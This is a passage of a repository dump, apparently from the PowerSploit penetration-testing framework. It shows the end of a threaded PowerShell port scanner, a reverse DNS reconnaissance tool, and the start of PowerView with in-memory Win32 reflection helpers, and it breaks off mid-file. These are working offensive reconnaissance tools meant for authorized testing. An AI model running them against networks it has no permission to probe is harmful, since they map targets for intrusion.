}\n            return $False\n        }\n\n        try\n        {\n\n            [bool] $SkipDiscovery = Convert-SwitchtoBool ($SkipDiscovery)\n            [bool] $PingOnly = Convert-SwitchtoBool ($PingOnly)\n            [bool] $quiet  = Convert-SwitchtoBool ($quiet)\n            [bool] $ForceOverwrite  = Convert-SwitchtoBool ($ForceOverwrite)\n\n            #########\n            #parse arguments\n            #########\n\n            [Environment]::CurrentDirectory=(Get-Location -PSProvider FileSystem).ProviderPath\n\n            if ($PsCmdlet.ParameterSetName -eq \"cmdHosts\")\n            {\n                foreach($h in $Hosts)\n                {\n                    Parse-Hosts($h) | Out-Null\n                }\n            }\n            else\n            {\n                Parse-ILHosts($HostFile) | Out-Null\n            }\n            if($ExcludeHosts)\n            {\n                Exclude-Hosts($ExcludeHosts)\n            }\n            if (($TopPorts -and $Ports) -or ($TopPorts -and $PortFile))\n            {\n                throw \"Cannot set topPorts with other specific ports\"\n            }\n            if($Ports)\n            {\n                Parse-Ports -Ports $Ports -pList $portList | Out-Null\n            }\n            if($PortFile)\n            {\n                Parse-IpPorts($PortFile) | Out-Null\n            }\n            if($portList.Count -eq 0)\n            {\n                if ($TopPorts)\n                {\n                    Get-TopPort($TopPorts) | Out-Null\n                }\n                else\n                {\n                    #if the ports still aren't set, give the deftault, top 50 ports\n                    Get-TopPort(50) | Out-Null\n                }\n            }\n            if ($ExcludedPorts)\n            {\n                Remove-Ports -ExcludedPorts $ExcludedPorts | Out-Null\n            }\n\n            if($T)\n            {\n                switch ($T)\n                {\n                    5 {$nHosts=30;  $Threads = 1000; $Timeout = 750 }\n                    4 {$nHosts=25;  $Threads = 1000; $Timeout = 1200 }\n                    3 {$nHosts=20;  $Threads = 100;  $Timeout = 2500 }\n                    2 {$nHosts=15;  $Threads = 32;   $Timeout = 3000 }\n                    1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }\n                    default {\n                        throw \"Invalid T parameter\"\n                    }\n                }\n            }\n\n            $grepStream = $null\n            $xmlStream = $null\n            $readableStream = $null\n\n            if($AllformatsOut)\n            {\n                if ($GrepOut -or $XmlOut -or $ReadableOut) {\n                     Write-Warning \"Both -oA specified with other output... going to ignore -oG/-oN/-oX\"\n                }\n                $GrepOut = $AllformatsOut + \".gnmap\"\n                $XmlOut = $AllformatsOut + \".xml\"\n                $ReadableOut = $AllformatsOut + \".nmap\"\n            }\n            if ($GrepOut) {\n                if (!$ForceOverwrite -and (Test-Path $GrepOut)) {\n                    throw \"Error: $AllformatsOut already exists. Either delete the file or specify the -f flag\"\n                }\n                $grepStream = [System.IO.StreamWriter] $GrepOut\n            }\n            if ($ReadableOut) {\n                if (!$ForceOverwrite -and (Test-Path $ReadableOut)) {\n                    throw \"Error: $ReadableOut already exists. Either delete the file or specify the -f flag\"\n                }\n                $readableStream = [System.IO.StreamWriter] $ReadableOut\n            }\n            if ($XmlOut) {\n                if (!$ForceOverwrite -and (Test-Path $XmlOut)) {\n                    throw \"Error: $XmlOut already exists. Either delete the file or specify the -f flag\"\n                }\n\n                $xmlStream =   [System.xml.xmlwriter]::Create([string]$XmlOut)\n                $xmlStream.WriteStartDocument()\n                $xmlStream.WriteStartElement(\"Portscanrun\")\n                $xmlStream.WriteAttributeString(\"version\", $version)\n\n            }\n\n            Parse-Ports -Ports $DiscoveryPorts -pList $hostPortList | Out-Null\n\n            $startdate = Get-Date\n            $myInvocationLine = $PSCmdlet.MyInvocation.Line\n            $startMsg = \"Invoke-Portscan.ps1 v$version scan initiated $startdate as: $myInvocationLine\"\n\n            #TODO deal with output\n            Write-PortscanOut -comment $startMsg -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream\n\n            # #converting back from int array gives some argument error checking\n            # $sPortList = [string]::join(\",\", $portList)\n            # $sHostPortList = [string]::join(\",\", $hostPortList)\n\n            ########\n            #Port Scan Code - run on a per host basis\n            ########\n            $portScanCode = {\n                param (\n                    [Parameter( Mandatory = $True)] [string] $thost,\n                    [Parameter( Mandatory = $True)][bool] $SkipDiscovery,\n                    [Parameter( Mandatory = $True)][bool] $PingOnly,\n                    [Parameter( Mandatory = $True)][int] $Timeout,\n                    [Parameter( Mandatory = $True)] $PortList,\n                    [Parameter( Mandatory = $True)] $hostPortList,\n                    [Parameter( Mandatory = $True)][int] $maxthreads)\n                Process\n                {\n                $openPorts = New-Object System.Collections.ArrayList\n                $closedPorts = New-Object System.Collections.ArrayList\n                $filteredPorts = New-Object System.Collections.ArrayList\n\n                $sockets = @{}\n                $timeouts = New-Object Hashtable\n\n                #set maximum $async threads\n                $fThreads = New-Object int\n                $aThreads = New-Object int\n                [System.Threading.ThreadPool]::GetMaxThreads([ref]$fThreads, [ref]$aThreads) | Out-Null\n                [System.Threading.ThreadPool]::SetMaxThreads($fthreads,$maxthreads) | Out-Null\n\n                function New-ScriptBlockCallback {\n                    param(\n                        [parameter(Mandatory=$true)]\n                        [ValidateNotNullOrEmpty()]\n                        [scriptblock]$Callback\n                    )\n\n                    #taken from http://www.nivot.org/blog/post/2009/10/09/PowerShell20AsynchronousCallbacksFromNET\n                    if (-not (\"CallbackEventBridge\" -as [type])) {\n                        Add-Type @\"\n                            using System;\n\n                            public sealed class CallbackEventBridge\n                            {\n                                public event AsyncCallback CallbackComplete = delegate { };\n\n                                private CallbackEventBridge() {}\n\n                                private void CallbackInternal(IAsyncResult result)\n                                {\n                                    CallbackComplete(result);\n                                }\n\n                                public AsyncCallback Callback\n                                {\n                                    get { return new AsyncCallback(CallbackInternal); }\n                                }\n\n                                public static CallbackEventBridge Create()\n                                {\n                                    return new CallbackEventBridge();\n                                }\n                            }\n\"@\n                    }\n\n                    $bridge = [CallbackEventBridge]::Create()\n                    Register-ObjectEvent -InputObject $bridge -EventName CallbackComplete -Action $Callback | Out-Null\n\n                    $bridge.Callback\n\n                }\n\n                function Test-Port {\n\n                    Param (\n                        [Parameter(Mandatory = $True)] [String] $h,\n                        [Parameter(Mandatory = $True)] [int] $p,\n                        [Parameter(Mandatory = $True)] [int] $timeout\n                    )\n\n                    try {\n                        $pAddress = [System.Net.IPAddress]::Parse($h)\n                        $sockets[$p] = new-object System.Net.Sockets.TcpClient $pAddress.AddressFamily\n\n                    }\n                    catch {\n                        #we're assuming this is a host name\n                        $sockets[$p] = new-object System.Net.Sockets.TcpClient\n                    }\n\n                    $scriptBlockAsString = @\"\n\n                        #somewhat of a race condition with the timeout, but I don't think it matters\n                        if ( `$sockets[$p] -ne `$NULL)\n                        {\n                            if (!`$timeouts[$p].Disposed) {\n                                `$timeouts[$p].Dispose()\n                            }\n\n                            `$status = `$sockets[$p].Connected;\n                            if (`$status -eq `$True)\n                            {\n                                #write-host \"$p is open\"\n                                `$openPorts.Add($p)\n                            }\n                            else\n                            {\n                                #write-host \"$p is closed\"\n                                `$closedPorts.Add($p)\n\n                            }\n                            `$sockets[$p].Close();\n\n                            `$sockets.Remove($p)\n                        }\n\"@\n                    $timeoutCallback = @\"\n                        #write-host \"$p is filtered\"\n                        `$sockets[$p].Close()\n                        if (!`$timeouts[$p].Disposed) {\n                            `$timeouts[$p].Dispose()\n                            `$filteredPorts.Add($p)\n                        }\n                        `$sockets.Remove($p)\n\"@\n\n                    $timeoutCallback = [scriptblock]::Create($timeoutCallback)\n\n                    $timeouts[$p] = New-Object System.Timers.Timer\n                    Register-ObjectEvent -InputObject $timeouts[$p] -EventName Elapsed -Action $timeoutCallback | Out-Null\n                    $timeouts[$p].Interval = $timeout\n                    $timeouts[$p].Enabled = $true\n\n                    $myscriptblock = [scriptblock]::Create($scriptBlockAsString)\n                    $Null = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null)\n                }\n\n                function PortScan-Alive\n                {\n                    Param (\n                        [Parameter(Mandatory = $True)] [String] $h\n                    )\n\n                    Try\n                    {\n\n                        #ping\n                        if ($hostPortList.Contains(-1))\n                        {\n                            $ping = new-object System.Net.NetworkInformation.Ping\n                            $pResult = $ping.send($h)\n                            if ($pResult.Status -eq \"Success\")\n                            {\n                                return $True\n                            }\n                        }\n                        foreach($Port in $hostPortList)\n                        {\n                            if ($Port -ne -1)\n                            {\n                                Test-Port -h $h -p $Port -timeout $Timeout\n                            }\n                        }\n\n                        do {\n                            Start-Sleep -Milli 100\n                            if (($openPorts.Count -gt 0) -or ($closedPorts.Count -gt 0)) {\n                                return $True\n                            }\n                        }\n                        While ($sockets.Count -gt 0)\n\n                    }\n                    Catch\n                    {\n                        Write-Error \"Exception trying to host scan $h\"\n                        Write-Error $_.Exception.Message;\n                    }\n\n                    return $False\n                }\n\n                function Portscan-Port\n                {\n                    Param (\n                        [Parameter(Mandatory = $True)] [String] $h\n                    )\n\n                    [string[]]$Ports = @()\n\n                    foreach($Port in $Portlist)\n                    {\n                        Try\n                        {\n                            Test-Port -h $h -p $Port -timeout $Timeout\n                        }\n                        Catch\n                        {\n                            Write-Error \"Exception trying to scan $h port $Port\"\n                            Write-Error $_.Exception.Message;\n                        }\n                    }\n                }\n                [bool] $hostResult = $False\n\n                if(!$SkipDiscovery)\n                {\n                    [bool] $hostResult = PortScan-Alive $thost\n                    $openPorts.clear()\n                    $closedPorts.clear()\n                    $filteredPorts.Clear()\n                }\n                if((!$PingOnly) -and ($hostResult -or $SkipDiscovery))\n                {\n                    Portscan-Port $thost\n                }\n                while ($sockets.Count -gt 0) {\n                    Start-Sleep -Milli 500\n                }\n\n                return @($hostResult, $openPorts, $closedPorts, $filteredPorts)\n                }\n            }\n\n            # the outer loop is to flush the loop.\n            # Otherwise Get-Job | Wait-Job could clog, etc\n\n            [int]$saveIteration = 0\n            [int]$computersDone=0\n            [int]$upHosts=0\n            while (($saveIteration * $SyncFreq) -lt $hostList.Count)\n            {\n\n                Get-Job | Remove-Job -Force\n                $sIndex = ($saveIteration*$SyncFreq)\n                $eIndex = (($saveIteration+1)*$SyncFreq)-1\n\n                foreach ($iHost in $hostList[$sIndex..$eIndex])\n                {\n                    $ctr = @(Get-Job -state Running)\n                    while ($ctr.Count -ge $nHosts)\n                    {\n                        Start-Sleep -Milliseconds $SleepTimer\n                        $ctr = @(Get-Job -state Running)\n                    }\n\n                    $computersDone++\n                    if(!$noProgressMeter)\n                    {\n                        Write-Progress -status \"Port Scanning\" -Activity $startMsg -CurrentOperation \"starting computer $computersDone\"  -PercentComplete ($computersDone / $hostList.Count * 100)\n                    }\n\n                    Start-Job -ScriptBlock $portScanCode -Name $iHost -ArgumentList @($iHost, $SkipDiscovery, $PingOnly, $Timeout, $portList, $hostPortList, $Threads)  | Out-Null\n                }\n\n                Get-Job | Wait-Job | Out-Null\n\n                foreach ($job in Get-Job)\n                {\n                    $jobOut = @(Receive-Job $job)\n                    [bool]$hostUp = $jobOut[0]\n                    $jobName = $job.Name\n\n                    $openPorts = $jobOut[1]\n                    $closedPorts = $jobOut[2]\n                    $filteredPorts = $jobOut[3]\n\n                    if($hostUp) {\n                        $upHosts ++\n                    }\n\n                    if (!$quiet)\n                    {\n                        $hostDate = Get-Date\n                        $hostObj = New-Object System.Object\n                        $hostObj | Add-Member -MemberType Noteproperty -Name Hostname -Value $jobName\n\n                        $hostObj | Add-Member -MemberType Noteproperty -Name alive -Value $hostUp\n                        $hostObj | Add-Member -MemberType Noteproperty -Name openPorts -Value $openPorts\n                        $hostObj | Add-Member -MemberType Noteproperty -Name closedPorts -Value $closedPorts\n                        $hostObj | Add-Member -MemberType Noteproperty -Name filteredPorts -Value $filteredPorts\n                        $hostObj | Add-Member -MemberType NoteProperty -Name finishTime -Value $hostDate\n\n                        $scannedHostList += $hostobj\n                    }\n\n                    Write-PortscanOut -outhost $jobName -isUp $hostUp -openPorts $openPorts -closedPorts $closedPorts -filteredPorts $filteredPorts -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream -SkipDiscovery $SkipDiscovery\n                }\n\n                if ($grepStream) {\n                    $grepStream.flush()\n                }\n                if ($xmlStream) {\n                    $xmlStream.flush()\n                }\n                if($readableStream) {\n                    $readableStream.flush()\n                }\n\n                $saveIteration ++\n            }\n\n            $enddate = Get-Date\n            $totaltime = ($enddate - $startdate).TotalSeconds\n            $endMsg = \"Port scan complete at $enddate ($totaltime seconds)\"\n            if (!$SkipDiscovery) {\n                $endMsg += \", $upHosts hosts are up\"\n            }\n\n            Write-PortscanOut -comment $endMsg -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream\n\n            if($grepStream) {\n                $grepStream.Close()\n            }\n            if ($xmlStream) {\n                $xmlStream.Close()\n            }\n            if($readableStream) {\n                $readableStream.Close()\n            }\n\n            return $scannedHostList\n\n        }\n        Catch\n        {\n            Write-Error $_.Exception.Message;\n        }\n    }\n}\n"
  },
  {
    "path": "Recon/Invoke-ReverseDnsLookup.ps1",
    "content": "function Invoke-ReverseDnsLookup\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nPerform a reverse DNS lookup scan on a range of IP addresses.\r\n\r\nPowerSploit Function: Invoke-ReverseDnsLookup  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nInvoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.\r\n\r\n.PARAMETER IPRange\r\n\r\nSpecifies the IP address range. The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. Comma-delimited ranges may can be provided.\r\n\r\n.EXAMPLE\r\n\r\nInvoke-ReverseDnsLookup 74.125.228.0/29\r\n\r\nIP              HostName\r\n--              --------\r\n74.125.228.1    iad23s05-in-f1.1e100.net\r\n74.125.228.2    iad23s05-in-f2.1e100.net\r\n74.125.228.3    iad23s05-in-f3.1e100.net\r\n74.125.228.4    iad23s05-in-f4.1e100.net\r\n74.125.228.5    iad23s05-in-f5.1e100.net\r\n74.125.228.6    iad23s05-in-f6.1e100.net\r\n\r\nDescription\r\n-----------\r\nReturns the hostnames of the IP addresses specified by the CIDR range.\r\n\r\n.EXAMPLE\r\n\r\nInvoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'\r\n\r\nIP              HostName\r\n--              --------\r\n74.125.228.1    iad23s05-in-f1.1e100.net\r\n74.125.228.4    iad23s05-in-f4.1e100.net\r\n74.125.228.5    iad23s05-in-f5.1e100.net\r\n74.125.228.6    iad23s05-in-f6.1e100.net\r\n\r\nDescription\r\n-----------\r\nReturns the hostnames of the IP addresses specified by the IP range specified.\r\n\r\n.EXAMPLE\r\n\r\nWrite-Output \"74.125.228.1,74.125.228.0/29\" | Invoke-ReverseDnsLookup\r\n\r\nIP                                                          HostName\r\n--                                                          --------\r\n74.125.228.1                                                iad23s05-in-f1.1e100.net\r\n74.125.228.1                                                iad23s05-in-f1.1e100.net\r\n74.125.228.2                                                iad23s05-in-f2.1e100.net\r\n74.125.228.3                                                iad23s05-in-f3.1e100.net\r\n74.125.228.4                                                iad23s05-in-f4.1e100.net\r\n74.125.228.5                                                iad23s05-in-f5.1e100.net\r\n74.125.228.6                                                iad23s05-in-f6.1e100.net\r\n\r\nDescription\r\n-----------\r\nReturns the hostnames of the IP addresses piped from another source.\r\n\r\n.LINK\r\n\r\nhttp://www.exploit-monday.com\r\nhttps://github.com/mattifestation/PowerSploit\r\n#>\r\n\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]\r\n    [CmdletBinding()]\r\n    Param (\r\n        [Parameter(Position = 0, Mandatory = $True,ValueFromPipeline=$True)]\r\n        [String]\r\n        $IpRange\r\n    )\r\n\r\n    BEGIN {\r\n\r\n        function Parse-IPList ([String] $IpRange)\r\n        {\r\n\r\n            function IPtoInt\r\n            {\r\n                Param([String] $IpString)\r\n\r\n                $Hexstr = \"\"\r\n                $Octets = $IpString.Split(\".\")\r\n                foreach ($Octet in $Octets) {\r\n                        $Hexstr += \"{0:X2}\" -f [Int] $Octet\r\n                }\r\n                return [Convert]::ToInt64($Hexstr, 16)\r\n            }\r\n\r\n            function InttoIP\r\n            {\r\n                Param([Int64] $IpInt)\r\n                $Hexstr = $IpInt.ToString(\"X8\")\r\n                $IpStr = \"\"\r\n                for ($i=0; $i -lt 8; $i += 2) {\r\n                        $IpStr += [Convert]::ToInt64($Hexstr.SubString($i,2), 16)\r\n                        $IpStr += '.'\r\n                }\r\n                return $IpStr.TrimEnd('.')\r\n            }\r\n\r\n            $Ip = [System.Net.IPAddress]::Parse(\"127.0.0.1\")\r\n\r\n            foreach ($Str in $IpRange.Split(\",\"))\r\n            {\r\n                $Item = $Str.Trim()\r\n                $Result = \"\"\r\n                $IpRegex = \"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\"\r\n\r\n                # First, validate the input\r\n                switch -regex ($Item)\r\n                {\r\n                    \"^$IpRegex/\\d{1,2}$\"\r\n                    {\r\n                        $Result = \"cidrRange\"\r\n                        break\r\n                    }\r\n                    \"^$IpRegex-$IpRegex$\"\r\n                    {\r\n                        $Result = \"range\"\r\n                        break\r\n                    }\r\n                    \"^$IpRegex$\"\r\n                    {\r\n                        $Result = \"single\"\r\n                        break\r\n                    }\r\n                    default\r\n                    {\r\n                        Write-Warning \"Improper input\"\r\n                        return\r\n                    }\r\n                }\r\n\r\n                #Now, start processing the IP addresses\r\n                switch ($Result)\r\n                {\r\n                    \"cidrRange\"\r\n                    {\r\n                        $CidrRange = $Item.Split(\"/\")\r\n                        $Network = $CidrRange[0]\r\n                        $Mask = $CidrRange[1]\r\n\r\n                        if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning \"Invalid IP address supplied!\"; return}\r\n                        if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning \"Invalid network mask! Acceptable values are 0-30\"; return}\r\n\r\n                        $BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0')\r\n                        #Generate lower limit (Excluding network address)\r\n                        $Lower = $BinaryIP.Substring(0, $Mask) + \"0\" * ((32-$Mask)-1) + \"1\"\r\n                        #Generate upper limit (Excluding broadcast address)\r\n                        $Upper = $BinaryIP.Substring(0, $Mask) + \"1\" * ((32-$Mask)-1) + \"0\"\r\n                        $LowerInt = [Convert]::ToInt64($Lower, 2)\r\n                        $UpperInt = [Convert]::ToInt64($Upper, 2)\r\n                        for ($i = $LowerInt; $i -le $UpperInt; $i++) { InttoIP $i }\r\n                    }\r\n                    \"range\"\r\n                    {\r\n                        $Range = $item.Split(\"-\")\r\n\r\n                        if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip }\r\n                        else { Write-Warning \"Invalid IP address supplied!\"; return }\r\n\r\n                        if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip }\r\n                        else { Write-Warning \"Invalid IP address supplied!\"; return }\r\n\r\n                        $Left = (IPtoInt $Temp1.ToString())\r\n                        $Right = (IPtoInt $Temp2.ToString())\r\n\r\n                        if ($Right -gt $Left) {\r\n                            for ($i = $Left; $i -le $Right; $i++) { InttoIP $i }\r\n                        }\r\n                        else { Write-Warning \"Invalid IP range. The right portion must be greater than the left portion.\"; return}\r\n\r\n                        break\r\n                    }\r\n                    \"single\"\r\n                    {\r\n                        if ([System.Net.IPAddress]::TryParse($Item,[ref]$Ip)) { $Ip.IPAddressToString }\r\n                        else { Write-Warning \"Invalid IP address supplied!\"; return }\r\n                        break\r\n                    }\r\n                    default\r\n                    {\r\n                        Write-Warning \"An error occurred.\"\r\n                        return\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n\r\n    PROCESS {\r\n        Parse-IPList $IpRange | ForEach-Object {\r\n            try {\r\n                Write-Verbose \"Resolving $_\"\r\n                $Temp = [System.Net.Dns]::GetHostEntry($_)\r\n\r\n                $Result = @{\r\n                    IP = $_\r\n                    HostName = $Temp.HostName\r\n                }\r\n\r\n                New-Object PSObject -Property $Result\r\n            }\r\n            catch [System.Net.Sockets.SocketException] {\r\n                Write-Verbose \"Error: $_\"\r\n            }\r\n        }\r\n    }\r\n}\r\n"
  },
  {
    "path": "Recon/PowerView.ps1",
    "content": "#requires -version 2\n\n<#\n\nPowerSploit File: PowerView.ps1\nAuthor: Will Schroeder (@harmj0y)\nLicense: BSD 3-Clause\nRequired Dependencies: None\n\n#>\n\n\n########################################################\n#\n# PSReflect code for Windows API access\n# Author: @mattifestation\n#   https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1\n#\n########################################################\n\nfunction New-InMemoryModule {\n<#\n.SYNOPSIS\n\nCreates an in-memory assembly and module\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nWhen defining custom enums, structs, and unmanaged functions, it is\nnecessary to associate to an assembly module. This helper function\ncreates an in-memory module that can be passed to the 'enum',\n'struct', and Add-Win32Type functions.\n\n.PARAMETER ModuleName\n\nSpecifies the desired name for the in-memory assembly and module. If\nModuleName is not provided, it will default to a GUID.\n\n.EXAMPLE\n\n$Module = New-InMemoryModule -ModuleName Win32\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ModuleName = [Guid]::NewGuid().ToString()\n    )\n\n    $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())\n    $LoadedAssemblies = $AppDomain.GetAssemblies()\n\n    foreach ($Assembly in $LoadedAssemblies) {\n        if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {\n            return $Assembly\n        }\n    }\n\n    $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)\n    $Domain = $AppDomain\n    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)\n\n    return $ModuleBuilder\n}\n\n\n# A helper function used to reduce typing while defining function\n# prototypes for Add-Win32Type.\nfunction func {\n    Param (\n        [Parameter(Position = 0, Mandatory = $True)]\n        [String]\n        $DllName,\n\n        [Parameter(Position = 1, Mandatory = $True)]\n        [string]\n        $FunctionName,\n\n        [Parameter(Position = 2, Mandatory = $True)]\n        [Type]\n        $ReturnType,\n\n        [Parameter(Position = 3)]\n        [Type[]]\n        $ParameterTypes,\n\n        [Parameter(Position = 4)]\n        [Runtime.InteropServices.CallingConvention]\n        $NativeCallingConvention,\n\n        [Parameter(Position = 5)]\n        [Runtime.InteropServices.CharSet]\n        $Charset,\n\n        [String]\n        $EntryPoint,\n\n        [Switch]\n        $SetLastError\n    )\n\n    $Properties = @{\n        DllName = $DllName\n        FunctionName = $FunctionName\n        ReturnType = $ReturnType\n    }\n\n    if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }\n    if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }\n    if ($Charset) { $Properties['Charset'] = $Charset }\n    if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }\n    if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }\n\n    New-Object PSObject -Property $Properties\n}\n\n\nfunction Add-Win32Type\n{\n<#\n.SYNOPSIS\n\nCreates a .NET type for an unmanaged Win32 function.\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: func\n\n.DESCRIPTION\n\nAdd-Win32Type enables you to easily interact with unmanaged (i.e.\nWin32 unmanaged) functions in PowerShell. After providing\nAdd-Win32Type with a function signature, a .NET type is created\nusing reflection (i.e. csc.exe is never called like with Add-Type).\n\nThe 'func' helper function can be used to reduce typing when defining\nmultiple function definitions.\n\n.PARAMETER DllName\n\nThe name of the DLL.\n\n.PARAMETER FunctionName\n\nThe name of the target function.\n\n.PARAMETER EntryPoint\n\nThe DLL export function name. This argument should be specified if the\nspecified function name is different than the name of the exported\nfunction.\n\n.PARAMETER ReturnType\n\nThe return type of the function.\n\n.PARAMETER ParameterTypes\n\nThe function parameters.\n\n.PARAMETER NativeCallingConvention\n\nSpecifies the native calling convention of the function. Defaults to\nstdcall.\n\n.PARAMETER Charset\n\nIf you need to explicitly call an 'A' or 'W' Win32 function, you can\nspecify the character set.\n\n.PARAMETER SetLastError\n\nIndicates whether the callee calls the SetLastError Win32 API\nfunction before returning from the attributed method.\n\n.PARAMETER Module\n\nThe in-memory module that will host the functions. Use\nNew-InMemoryModule to define an in-memory module.\n\n.PARAMETER Namespace\n\nAn optional namespace to prepend to the type. Add-Win32Type defaults\nto a namespace consisting only of the name of the DLL.\n\n.EXAMPLE\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n$FunctionDefinitions = @(\n  (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),\n  (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),\n  (func ntdll RtlGetCurrentPeb ([IntPtr]) @())\n)\n\n$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'\n$Kernel32 = $Types['kernel32']\n$Ntdll = $Types['ntdll']\n$Ntdll::RtlGetCurrentPeb()\n$ntdllbase = $Kernel32::GetModuleHandle('ntdll')\n$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')\n\n.NOTES\n\nInspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189\n\nWhen defining multiple function prototypes, it is ideal to provide\nAdd-Win32Type with an array of function signatures. That way, they\nare all incorporated into the same in-memory module.\n#>\n\n    [OutputType([Hashtable])]\n    Param(\n        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]\n        [String]\n        $DllName,\n\n        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]\n        [String]\n        $FunctionName,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [String]\n        $EntryPoint,\n\n        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]\n        [Type]\n        $ReturnType,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Type[]]\n        $ParameterTypes,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Runtime.InteropServices.CallingConvention]\n        $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Runtime.InteropServices.CharSet]\n        $Charset = [Runtime.InteropServices.CharSet]::Auto,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Switch]\n        $SetLastError,\n\n        [Parameter(Mandatory=$True)]\n        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\n        $Module,\n\n        [ValidateNotNull()]\n        [String]\n        $Namespace = ''\n    )\n\n    BEGIN\n    {\n        $TypeHash = @{}\n    }\n\n    PROCESS\n    {\n        if ($Module -is [Reflection.Assembly])\n        {\n            if ($Namespace)\n            {\n                $TypeHash[$DllName] = $Module.GetType(\"$Namespace.$DllName\")\n            }\n            else\n            {\n                $TypeHash[$DllName] = $Module.GetType($DllName)\n            }\n        }\n        else\n        {\n            # Define one type for each DLL\n            if (!$TypeHash.ContainsKey($DllName))\n            {\n                if ($Namespace)\n                {\n                    $TypeHash[$DllName] = $Module.DefineType(\"$Namespace.$DllName\", 'Public,BeforeFieldInit')\n                }\n                else\n                {\n                    $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')\n                }\n            }\n\n            $Method = $TypeHash[$DllName].DefineMethod(\n                $FunctionName,\n                'Public,Static,PinvokeImpl',\n                $ReturnType,\n                $ParameterTypes)\n\n            # Make each ByRef parameter an Out parameter\n            $i = 1\n            foreach($Parameter in $ParameterTypes)\n            {\n                if ($Parameter.IsByRef)\n                {\n                    [void] $Method.DefineParameter($i, 'Out', $null)\n                }\n\n                $i++\n            }\n\n            $DllImport = [Runtime.InteropServices.DllImportAttribute]\n            $SetLastErrorField = $DllImport.GetField('SetLastError')\n            $CallingConventionField = $DllImport.GetField('CallingConvention')\n            $CharsetField = $DllImport.GetField('CharSet')\n            $EntryPointField = $DllImport.GetField('EntryPoint')\n            if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }\n\n            if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }\n\n            # Equivalent to C# version of [DllImport(DllName)]\n            $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])\n            $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,\n                $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),\n                [Reflection.FieldInfo[]] @($SetLastErrorField,\n                                           $CallingConventionField,\n                                           $CharsetField,\n                                           $EntryPointField),\n                [Object[]] @($SLEValue,\n                             ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),\n                             ([Runtime.InteropServices.CharSet] $Charset),\n                             $ExportedFuncName))\n\n            $Method.SetCustomAttribute($DllImportAttribute)\n        }\n    }\n\n    END\n    {\n        if ($Module -is [Reflection.Assembly])\n        {\n            return $TypeHash\n        }\n\n        $ReturnTypes = @{}\n\n        foreach ($Key in $TypeHash.Keys)\n        {\n            $Type = $TypeHash[$Key].CreateType()\n\n            $ReturnTypes[$Key] = $Type\n        }\n\n        return $ReturnTypes\n    }\n}\n\n\nfunction psenum 